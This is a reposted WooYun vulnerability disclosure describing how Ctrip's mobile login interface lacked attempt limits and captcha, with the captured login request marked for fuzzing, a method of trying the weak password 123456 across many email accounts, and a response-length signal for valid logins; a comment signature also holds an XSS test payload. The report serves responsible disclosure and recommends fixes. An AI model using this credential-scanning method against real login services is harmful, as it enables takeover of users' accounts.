携程某接口设计缺陷可进行扫号(可获取大量账号密码)

admin 2015年6月8日16:32:14评论562 views字数 219阅读0分43秒阅读模式
摘要

2014-09-04: 细节已通知厂商并且等待厂商处理中
2014-09-04: 厂商已经确认,细节仅向厂商公开
2014-09-14: 细节向核心白帽子及相关领域专家公开
2014-09-24: 细节向普通白帽子公开
2014-10-04: 细节向实习白帽子公开
2014-10-24: 细节向公众公开

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2014-75056

漏洞标题: 携程某接口设计缺陷可进行扫号(可获取大量账号密码) 携程某接口设计缺陷可进行扫号(可获取大量账号密码)

相关厂商: 携程旅行网

漏洞作者: niliu携程某接口设计缺陷可进行扫号(可获取大量账号密码)

提交时间: 2014-09-04 19:33

公开时间: 2014-10-24 19:36

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计缺陷/边界绕过

2人收藏


漏洞详情

披露状态:

2014-09-04: 细节已通知厂商并且等待厂商处理中
2014-09-04: 厂商已经确认,细节仅向厂商公开
2014-09-14: 细节向核心白帽子及相关领域专家公开
2014-09-24: 细节向普通白帽子公开
2014-10-04: 细节向实习白帽子公开
2014-10-24: 细节向公众公开

简要描述:

接口限制总有遗漏,涉及用户数据,提交!

详细说明:

问题接口出现在携程触屏版登陆

code 区域
http://m.ctrip.com/html5/Account/Login.html

携程某接口设计缺陷可进行扫号(可获取大量账号密码)

经简单测试发现登陆没有错误次数限制,也不会弹出验证码。

于是随便输入用户名,密码。登陆时抓包进行fuzz

抓包数据

code 区域
POST /html5/Account/LoginValidation HTTP/1.1
Host: m.ctrip.com
Proxy-Connection: keep-alive
Content-Length: 292
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: http://m.ctrip.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X; en-us) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://m.ctrip.com/html5/Account/Login.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie:

UID=§admin§&Password=2ec5ed31996e031281e8da203fa1a2851921cbb7b2cd27bdf4a0ab9fe430f035391638c46e25e821035b5ff71a08b84cb9eaa7573d5988122483ec14ca2331c42e61bb74ff7d1b6853bafaf9b09c376a462fa3c8a582e752b2fcff9dcdf3af080558daea8fd973afd92b4b42e2c64377e5876257484eb4a671c3b83cc315d138&IsRemember=false

可以看到密码是经过加密的。

我就以密码不变,随便找个最简单的弱口令123456来进行测试

测试一部分邮箱账号。

携程某接口设计缺陷可进行扫号(可获取大量账号密码)

返回包402的为密码错误,大于402的都是可以登陆的

贴出部分证明

code 区域
guo

































以上这些账号密码均为123456,。

贴部分登陆证明

携程某接口设计缺陷可进行扫号(可获取大量账号密码)

携程某接口设计缺陷可进行扫号(可获取大量账号密码)

携程某接口设计缺陷可进行扫号(可获取大量账号密码)

g**

携程某接口设计缺陷可进行扫号(可获取大量账号密码)

携程某接口设计缺陷可进行扫号(可获取大量账号密码)

漏洞证明:

综上所述,密码可以变换其他的来进行测试。

在大数据时代,基于之前泄露的各种用户数据进行测试,影响用户数量还是很可观的.

修复方案:

对触屏版登陆接口进行登陆次数限制。

加入验证码进行限制。

版权声明:转载请注明来源 niliu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-04 19:35

厂商回复:

漏洞已确认真实存在,并已安排人处理。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-10-24 19:55 | 切克脑 ( 实习白帽子 | Rank:31 漏洞数:9 | z..)

    1

    这么多$$$$$$$$$$$$$$$$$$$$$$$

  2. 2014-10-24 20:21 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    0

    为何这么多$$$???

  3. 2014-10-24 20:33 | 咖啡 ( 实习白帽子 | Rank:62 漏洞数:23 )

    0

    邮箱是怎么搞到的

  4. 2014-10-24 21:30 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    卧槽、3000啊

  5. 2014-10-24 22:43 | 切克脑 ( 实习白帽子 | Rank:31 漏洞数:9 | z..)

    0

    呀$$$$$$$$$$$$没了

  6. 2014-10-24 22:44 | 切克脑 ( 实习白帽子 | Rank:31 漏洞数:9 | z..)

    0

    点进去就不显示了...

  7. 2014-10-26 00:25 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 冬眠者)

    0

    @老和尚 $$$。。。一个是几十几百 两个是几百几千 三个 这漏洞都上 国家级刊物 计算机安全了

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin